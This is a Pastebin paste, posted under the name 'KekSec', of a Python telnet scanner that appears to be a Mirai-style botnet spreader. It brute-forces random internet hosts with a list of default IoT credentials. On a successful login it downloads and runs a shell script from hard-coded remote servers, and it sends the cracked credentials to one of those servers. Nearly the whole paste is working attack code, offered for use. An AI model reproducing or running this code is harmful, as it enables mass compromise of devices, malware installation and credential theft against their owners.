API tools faq
paste
KekSec

TELNET SCANNER

KekSec
Jul 7th, 2020
950
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.39 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. import threading, sys, os, re, time, random, socket, select, itertools
  3.  
  4. if len(sys.argv) < 3:
  5. print "Usage: python "+sys.argv[0]+" <threads> <output file>"
  6. sys.exit()
  7.  
  8. combo = [
  9. "root:root",
  10. "root:",
  11. "admin:admin",
  12. "support:support",
  13. "user:user",
  14. "admin:",
  15. "admin:password",
  16. "root:vizxv",
  17. "root:admin",
  18. "root:xc3511",
  19. "root:888888",
  20. "root:xmhdipc",
  21. "root:default",
  22. "root:juantech",
  23. "root:123456",
  24. "root:54321",
  25. "root:12345",
  26. "root:pass",
  27. "ubnt:ubnt",
  28. "root:klv1234",
  29. "root:Zte521",
  30. "root:hi3518",
  31. "root:jvbzd",
  32. "root:anko",
  33. "root:zlxx.",
  34. "root:7ujMko0vizxv",
  35. "root:7ujMko0admin",
  36. "root:system",
  37. "root:ikwb",
  38. "root:dreambox",
  39. "root:user",
  40. "root:realtek",
  41. "root:00000000",
  42. "admin:1111111",
  43. "admin:1234",
  44. "admin:12345",
  45. "admin:54321",
  46. "admin:123456",
  47. "admin:7ujMko0admin",
  48. "admin:1234",
  49. "admin:pass",
  50. "admin:meinsm",
  51. "admin:admin1234",
  52. "root:1111",
  53. "admin:smcadmin",
  54. "admin:1111",
  55. "root:666666",
  56. "root:password",
  57. "root:1234",
  58. "root:klv123",
  59. "Administrator:admin",
  60. "service:service",
  61. "supervisor:supervisor",
  62. "guest:guest",
  63. "guest:12345",
  64. "guest:12345",
  65. "admin1:password",
  66. "administrator:1234",
  67. "666666:666666",
  68. "888888:888888",
  69. "tech:tech"
  70. ]
  71.  
  72. threads = int(sys.argv[1])
  73. output_file = sys.argv[2]
  74.  
  75. def readUntil(tn, string, timeout=8):
  76. buf = ''
  77. start_time = time.time()
  78. while time.time() - start_time < timeout:
  79. buf += tn.recv(1024)
  80. time.sleep(0.1)
  81. if string in buf: return buf
  82. raise Exception('TIMEOUT!')
  83.  
  84. def recvTimeout(sock, size, timeout=8):
  85. sock.setblocking(0)
  86. ready = select.select([sock], [], [], timeout)
  87. if ready[0]:
  88. data = sock.recv(size)
  89. return data
  90. return ""
  91.  
  92.  
  93. def router(ip, port):
  94. ip = str(ip).rstrip('\n')
  95. rekdevice="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.10.68.175/update.sh -O update.sh; busybox wget http://185.10.68.175/update.sh -O update.sh; ftpget -v -u anonymous -p anonymous -P 21 196.53.114.199 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 196.53.114.199 update.sh update.sh; chmod 777 update.sh; ./update.sh; rm -rf update.sh"
  96. global fh
  97. username = ""
  98. password = ""
  99. for passwd in combo:
  100. if ":n/a" in passwd:
  101. password=""
  102. else:
  103. password=passwd.split(":")[1]
  104. if "n/a:" in passwd:
  105. username=""
  106. else:
  107. username=passwd.split(":")[0]
  108. try:
  109. tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  110. tn.settimeout(1)
  111. tn.connect((ip,port))
  112. except Exception:
  113. break
  114. try:
  115. hoho = ''
  116. hoho += readUntil(tn, ":")
  117. if ":" in hoho:
  118. tn.send(username + "\r\n")
  119. time.sleep(0.1)
  120. hoho = ''
  121. hoho += readUntil(tn, ":")
  122. if ":" in hoho:
  123. tn.send(password + "\r\n")
  124. time.sleep(0.1)
  125. prompt = ''
  126. prompt += recvTimeout(tn, 40960)
  127. if "#" in prompt or "$" in prompt or ">" in prompt:
  128. success = True
  129. else:
  130. tn.close()
  131. continue
  132. if success == True:
  133. try:
  134. tn.send(rekdevice + "\r\n")
  135. fh.write(ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass //mirai
  136. fh.flush()
  137. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  138. s.connect(("185.10.68.175", 8080))
  139. s.send(ip + ":" + str(port) + " " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass //mirai
  140. s.close()
  141. print "[+] GOTCHA -> %s:%s:%s"%(username, password, ip)
  142. tn.close()
  143. break
  144. except:
  145. tn.close()
  146. else:
  147. tn.close()
  148. except Exception:
  149. pass
  150.  
  151.  
  152. def gen_IP():
  153. not_valid = [10,127,169,172,192,185,233,234]
  154. first = random.randrange(1,256)
  155. while first in not_valid:
  156. first = random.randrange(1,256)
  157. ip = ".".join([str(first),str(random.randrange(1,256)),
  158. str(random.randrange(1,256)),str(random.randrange(1,256))])
  159. return ip
  160. def worker():
  161. while True:
  162. IP = gen_IP()
  163. try:
  164. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  165. s.settimeout(0.5)
  166. s.connect((IP, 23))
  167. s.close()
  168. router(IP, 23)
  169. except Exception as e:
  170. pass
  171.  
  172. global fh
  173. fh = open(output_file, "a")
  174. for l in xrange(threads):
  175. try:
  176. t = threading.Thread(target=worker)
  177. t.start()
  178. except:
  179. pass
  180.  
  181. print "Started " + str(threads) + " scanner threads! Press enter to stop."
  182.  
  183. raw_input()
  184. os.kill(os.getpid(), 9)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!